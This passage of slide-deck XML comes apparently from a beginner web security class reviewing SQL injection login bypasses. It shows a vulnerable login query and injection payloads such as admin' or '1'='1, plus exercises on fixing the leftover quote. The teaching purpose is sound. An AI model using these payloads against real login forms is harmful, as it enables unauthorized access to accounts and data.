              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>The error output suggests that the server is using a single quote.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1343" name="Google Shape;1343;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2202050"/>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Add an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> statement to your injection. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>If the server uses double quotes, your query should now look like: admin" or &lt;Condition&gt;, where &lt;Condition&gt; is your always-true condition, such as '2'='2'.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1344" name="Google Shape;1344;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3501615"/>
            <a:ext cx="9144000" cy="702300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>‘1’=’1</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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8" name="Shape 1348"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1349" name="Google Shape;1349;p9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Login Bypassess Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1350" name="Google Shape;1350;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="1875900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suppose the SQL statement on the server looks like the below, where the username you submit to the form gets substituted in $USERNAME:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="D73A49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F8FA"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="032F62"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F8FA"/>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a:t>What does the statement look like if you substitute you payload for? $USERNAME?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1351" name="Google Shape;1351;p9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52" name="Google Shape;1352;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3411638"/>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You might notice an extra quote. How can you modify your payload to remove it? </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1353" name="Google Shape;1353;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374500" y="1491425"/>
            <a:ext cx="8284500" cy="780000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username='$USERNAME' and password='$PASSWORD'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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7" name="Shape 1357"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1358" name="Google Shape;1358;p9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Login Bypassess Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1359" name="Google Shape;1359;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="1875900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suppose the SQL statement on the server looks like the below, where the username you submit to the form gets substituted in $USERNAME:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="D73A49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F8FA"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="032F62"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F8FA"/>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a:t>What does the statement look like if you substitute you payload for? $USERNAME?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1360" name="Google Shape;1360;p9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61" name="Google Shape;1361;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3041723"/>
            <a:ext cx="9144000" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username='admin' or '1'='1'' and password='$PASSWORD'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1362" name="Google Shape;1362;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3411638"/>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You might notice an extra quote. How can you modify your payload to remove it? </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1363" name="Google Shape;1363;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374500" y="1491425"/>
            <a:ext cx="8284500" cy="780000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username='$USERNAME' and password='$PASSWORD'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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7" name="Shape 1367"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1368" name="Google Shape;1368;p9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Login Bypassess Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1369" name="Google Shape;1369;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="1875900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
